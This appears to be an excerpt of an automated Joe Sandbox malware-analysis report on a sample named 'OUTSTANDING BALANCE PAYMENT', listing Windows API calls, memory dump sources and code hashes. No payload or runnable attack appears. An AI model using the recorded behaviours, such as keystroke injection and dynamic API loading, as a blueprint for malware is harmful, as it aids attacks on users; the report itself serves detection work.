                                                          • Opcode Fuzzy Hash: 05eecd73a51fed28ca4973872898d40c8ed95db067c0e5efa345e4d6b8bc20f1
                                                          • Instruction Fuzzy Hash: 56D0C7749647229FDB209F65E888741B6E4EB16711F14C46DE456E3150DAB0C8C19B51
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00BA052F,?,00BA06D7), ref: 00BA0572
                                                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00BA0584
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                          • API String ID: 2574300362-1587604923
                                                          • Opcode ID: b7227a4cd7ca7dd934cd88a0775f7ca626614d2bd37604d6798142df77004bf9
                                                          • Instruction ID: 5a0af59e406b0ce875a04f0554938e99d57c3cacf00b517a88bdb1cb947c5f24
                                                          • Opcode Fuzzy Hash: b7227a4cd7ca7dd934cd88a0775f7ca626614d2bd37604d6798142df77004bf9
                                                          • Instruction Fuzzy Hash: C0D0A7349183229FC7206FB0E888B4277E4EB16300F10846DE881E3150DBB0C4C49F20
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00BBECBE,?,00BBEBBB), ref: 00BBECD6
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BBECE8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: f5f59698099b171ea82398e34a9b3e02b5892235d88b10bdd6e64bf8a73ce5cb
                                                          • Instruction ID: f95ab98a8b8d33ba0170aff164c50bbc3cb6cf8a28fc2b564dbf544e822e04f3
                                                          • Opcode Fuzzy Hash: f5f59698099b171ea82398e34a9b3e02b5892235d88b10bdd6e64bf8a73ce5cb
                                                          • Instruction Fuzzy Hash: D0D0A7345007239FCB205F60E8887D27AE4EF05301B00846DF855E7160DFF0C8C49750
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00BBBAD3,00000001,00BBB6EE,?,00BFDC00), ref: 00BBBAEB
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BBBAFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 575a9f451959cffbb35d4bba3e60ecd10450a14b99a6b34ac16bd826cfbec13f
                                                          • Instruction ID: 16ba20facf355603fc8a4dfa1a199ff6dd4364db1d8bd09177b6e6ede0cbd586
                                                          • Opcode Fuzzy Hash: 575a9f451959cffbb35d4bba3e60ecd10450a14b99a6b34ac16bd826cfbec13f
                                                          • Instruction Fuzzy Hash: 36D092789007129FDB349F65A888BA276E8EB05751B10846EA897A2254EBF0D880CA51
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00BC3BD1,?,00BC3E06), ref: 00BC3BE9
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BC3BFB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: d531d93e78874d3982d83edddb06e9086317ee9c4a989ef24df03d9dc39e0433
                                                          • Instruction ID: d1f9d2170ad23a32f310759bf5600fb6f00cc393601746650fcb03d301a1e405
                                                          • Opcode Fuzzy Hash: d531d93e78874d3982d83edddb06e9086317ee9c4a989ef24df03d9dc39e0433
                                                          • Instruction Fuzzy Hash: 4DD0A7705007529FC7205F60E848B47BAF4EB02718B10846DF445F3250DAF4C4C08F10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3487a5c5d26573959ebe7c17e130244cf0f3381e6d290567af407bdc0e495750
                                                          • Instruction ID: 4228bc4110ae1db83ed8b4397404c0741d07fa34717fb569e1bc9114c556cb51
                                                          • Opcode Fuzzy Hash: 3487a5c5d26573959ebe7c17e130244cf0f3381e6d290567af407bdc0e495750
                                                          • Instruction Fuzzy Hash: 03C12B75A0021AEFDF54DF98C884AAEB7F5FF48700F1085ACE905AB251D7319E81DB90
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00BBAAB4
                                                          • CoUninitialize.OLE32 ref: 00BBAABF
                                                            • Part of subcall function 00BA0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BA027B
                                                          • VariantInit.OLEAUT32(?), ref: 00BBAACA
                                                          • VariantClear.OLEAUT32(?), ref: 00BBAD9D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: 12721f02383691f05988ce1f335f8a80750f25ab68b13dd092718433fabea329
                                                          • Instruction ID: e1694680ef93b043cf988cf8bc5aac367bad8908d8f3e6d29db96f94bd694a76
                                                          • Opcode Fuzzy Hash: 12721f02383691f05988ce1f335f8a80750f25ab68b13dd092718433fabea329
                                                          • Instruction Fuzzy Hash: E8A14B356047019FDB10DF18C891B6AB7E5FF88710F148499F99A9B3A2CB74ED44CB86
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: dbd5e85ba816763d7e11e0a8ff5377124530fc43116db086949af187d4c137ee
                                                          • Instruction ID: 282bdbed43d2e948570a7a117c072a6702be15224bd68692a795961ab12be974
                                                          • Opcode Fuzzy Hash: dbd5e85ba816763d7e11e0a8ff5377124530fc43116db086949af187d4c137ee
                                                          • Instruction Fuzzy Hash: 43518230608306ABDFA49F6DD4D1A2EB7E5EF55310B24C8BFE55ACB2D1DB7498808709
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                          • String ID:
                                                          • API String ID: 3877424927-0
                                                          • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                          • Instruction ID: 4fd362f54bd0ef3a0ad82601b97059a5c01ba0a9286229fab1d5649f31b10480
                                                          • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                          • Instruction Fuzzy Hash: B35185B4A04205ABDB24BF69C89596E77E1EF40F20F2486A9F835962F0E775DF50CB40
                                                          APIs
                                                          • GetWindowRect.USER32(01696DB8,?), ref: 00BCC544
                                                          • ScreenToClient.USER32(?,00000002), ref: 00BCC574
                                                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00BCC5DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: 76b7660b78fb9e348dd8e08998d261a975541c5b02ddf71e1806bda1a7e37af4
                                                          • Instruction ID: 3c36224b3ba83f36220f82c36ec0cb812711a5a3611506db5d799eb7a7b9ecfc
                                                          • Opcode Fuzzy Hash: 76b7660b78fb9e348dd8e08998d261a975541c5b02ddf71e1806bda1a7e37af4
                                                          • Instruction Fuzzy Hash: 43512E75900104EFCF20DF68C881EAE7BF5EB65320F1486A9F9599B291D770ED41CB90
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B9C462
                                                          • __itow.LIBCMT ref: 00B9C49C
                                                            • Part of subcall function 00B9C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B9C753
                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B9C505
                                                          • __itow.LIBCMT ref: 00B9C55A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: 3a7f595233b5b53dcf679e54856098286d1eb125e6388658be83e672bcf78701
                                                          • Instruction ID: f2bf938506971eca60a9e2b079627eb184678a3a5d9b98badc1de3d6ad979781
                                                          • Opcode Fuzzy Hash: 3a7f595233b5b53dcf679e54856098286d1eb125e6388658be83e672bcf78701
                                                          • Instruction Fuzzy Hash: 77418271A00208AFDF25EF54C852BEE7FF9EF59700F0040A9FA05A7291DB749A55CBA1
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BA3966
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BA3982
                                                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00BA39EF
                                                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00BA3A4D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: aedcaa05c0046a74ded6ace9553f9c4e468f3b3ef0d8066dff685b7b0ed109ba
                                                          • Instruction ID: b5925a92d80564ad86f597f0df824495edf2677a5b15164cd8aa8edd91472b2c
                                                          • Opcode Fuzzy Hash: aedcaa05c0046a74ded6ace9553f9c4e468f3b3ef0d8066dff685b7b0ed109ba
                                                          • Instruction Fuzzy Hash: E5412970A0C258AEEF248B64C8467FEBBF5DB57710F04019AF4C2561C1C7B58E85D761
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BAE742
                                                          • GetLastError.KERNEL32(?,00000000), ref: 00BAE768
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BAE78D
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BAE7B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 43a132df807db5ede35005f0e4b7cb91ef823ea5c4c5821edc0fd9456595605c
                                                          • Instruction ID: 406b60870b66fb1da642395deaacda6e52ac95d8a36ff0f15886f3d7c6ed356c
                                                          • Opcode Fuzzy Hash: 43a132df807db5ede35005f0e4b7cb91ef823ea5c4c5821edc0fd9456595605c
                                                          • Instruction Fuzzy Hash: C74104396006109FCF11AF15C484A4DBBE5FF9A710B0984D8E95AAB3A2CB78FD008B95
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BCB5D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: a8fbf2f08631a4c93c10e129f2ba72bb32dd280b5e0f0f88bd9b3efab5e44268
                                                          • Instruction ID: a83a5eded9006dd265b48b9b4363f8ea45a4c290ffa7a4c7a8b8327bb7497e2f
                                                          • Opcode Fuzzy Hash: a8fbf2f08631a4c93c10e129f2ba72bb32dd280b5e0f0f88bd9b3efab5e44268
                                                          • Instruction Fuzzy Hash: B831DC74601208EFEF208F18CC9AFACB7E5EB25310F6441A9FA51D72E1CB30A9408B51
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 00BCD807
                                                          • GetWindowRect.USER32(?,?), ref: 00BCD87D
                                                          • PtInRect.USER32(?,?,00BCED5A), ref: 00BCD88D
                                                          • MessageBeep.USER32(00000000), ref: 00BCD8FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 366ce60c0af63c1d8ce28c6d08d7c38e69dbdb740fe973dcd76da39f0e306457
                                                          • Instruction ID: 49902431f7d6e263711c2306deb48bc46b06835a8270cbd19632c49bf34fe09c
                                                          • Opcode Fuzzy Hash: 366ce60c0af63c1d8ce28c6d08d7c38e69dbdb740fe973dcd76da39f0e306457
                                                          • Instruction Fuzzy Hash: 63415378A00219DFCB21DF58D884FADBBF5FB88310F1881F9E8559B2A4D730A946CB50
                                                          APIs
                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00BA3AB8
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BA3AD4
                                                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00BA3B34
                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00BA3B92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 699c6426c6d7c5fc68c82968f65bf2523307f22615aa301eb17f94d9e4b10e4b
                                                          • Instruction ID: 5bcd56a68de0ef249a4a8271cf53d0871216afe04b24ef8a4775c908d8329176
                                                          • Opcode Fuzzy Hash: 699c6426c6d7c5fc68c82968f65bf2523307f22615aa301eb17f94d9e4b10e4b
                                                          • Instruction Fuzzy Hash: 40315530A08258AEEF248B68C859BFE7BE6DB57710F84019AF481972D1C7748F85D771
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B94038
                                                          • __isleadbyte_l.LIBCMT ref: 00B94066
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B94094
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B940CA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 41963ff026f2e304f19793c1454f2ec28c13a55de7f01da78a91a80193e2cc85
                                                          • Instruction ID: 47d5dffc9b987943a47906d811b52f72044027a8b6e543532f0db3d0ffd312a7
                                                          • Opcode Fuzzy Hash: 41963ff026f2e304f19793c1454f2ec28c13a55de7f01da78a91a80193e2cc85
                                                          • Instruction Fuzzy Hash: BC31BE31600246AFDF229F75C884FAA7BE5FF41310F1585B8EA658B1A0E731D892DB90
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00BC7CB9
                                                            • Part of subcall function 00BA5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA5F6F
                                                            • Part of subcall function 00BA5F55: GetCurrentThreadId.KERNEL32 ref: 00BA5F76
                                                            • Part of subcall function 00BA5F55: AttachThreadInput.USER32(00000000,?,00BA781F), ref: 00BA5F7D
                                                          • GetCaretPos.USER32(?), ref: 00BC7CCA
                                                          • ClientToScreen.USER32(00000000,?), ref: 00BC7D03
                                                          • GetForegroundWindow.USER32 ref: 00BC7D09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 330303fc60c8e5d1a18b177c1086d3f1258e7672d076d873d752a4ba23c2d707
                                                          • Instruction ID: 03e11ed3d9fbea897a5fcd0c0505b7b1521e3ee6a12d68ed3d7cf016eb162906
                                                          • Opcode Fuzzy Hash: 330303fc60c8e5d1a18b177c1086d3f1258e7672d076d873d752a4ba23c2d707
